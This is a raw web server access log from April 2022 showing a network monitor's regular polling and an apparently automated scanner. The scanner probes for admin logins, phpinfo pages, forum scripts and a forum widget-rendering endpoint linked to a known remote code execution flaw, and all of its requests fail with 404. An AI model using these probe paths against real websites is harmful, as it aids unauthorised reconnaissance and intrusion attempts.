212.91.246.72 - - [02/Apr/2022:07:47:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:48:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:49:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Apr/2022:07:50:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.72 - - [02/Apr/2022:07:51:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [02/Apr/2022:07:51:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
220.249.4.46 - - [02/Apr/2022:07:51:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
220.249.4.46 - - [02/Apr/2022:07:51:35 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
220.249.4.46 - - [02/Apr/2022:07:51:36 +0200] "POST /Admin53f65bd4/Login.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0"
220.249.4.46 - - [02/Apr/2022:07:51:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0"
220.249.4.46 - - [02/Apr/2022:07:51:58 +0200] "GET /l.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0"
220.249.4.46 - - [02/Apr/2022:07:51:58 +0200] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0"
220.249.4.46 - - [02/Apr/2022:07:51:58 +0200] "GET /test.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0"
220.249.4.46 - - [02/Apr/2022:07:51:58 +0200] "POST /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0"
220.249.4.46 - - [02/Apr/2022:07:52:20 +0200] "POST /bbs.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0"
212.91.246.72 - - [02/Apr/2022:07:52:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
220.249.4.46 - - [02/Apr/2022:07:52:42 +0200] "POST /forum.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0"
220.249.4.46 - - [02/Apr/2022:07:53:03 +0200] "POST /forums.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0"
220.249.4.46 - - [02/Apr/2022:07:53:25 +0200] "POST /bbs/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0"
212.91.246.72 - - [02/Apr/2022:07:53:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
220.249.4.46 - - [02/Apr/2022:07:53:47 +0200] "POST /forum/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0"
220.249.4.46 - - [02/Apr/2022:07:54:09 +0200] "POST /forums/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0"
212.91.246.72 - - [02/Apr/2022:07:54:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
220.249.4.46 - - [02/Apr/2022:07:54:30 +0200] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 349 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36"
220.249.4.46 - - [02/Apr/2022:07:54:30 +0200] "POST /bbs/ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 353 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36"
220.249.4.46 - - [02/Apr/2022:07:54:31 +0200] "POST /forum/ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 355 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36"
220.249.4.46 - - [02/Apr/2022:07:54:31 +0200] "POST /forums/ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 356 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36"
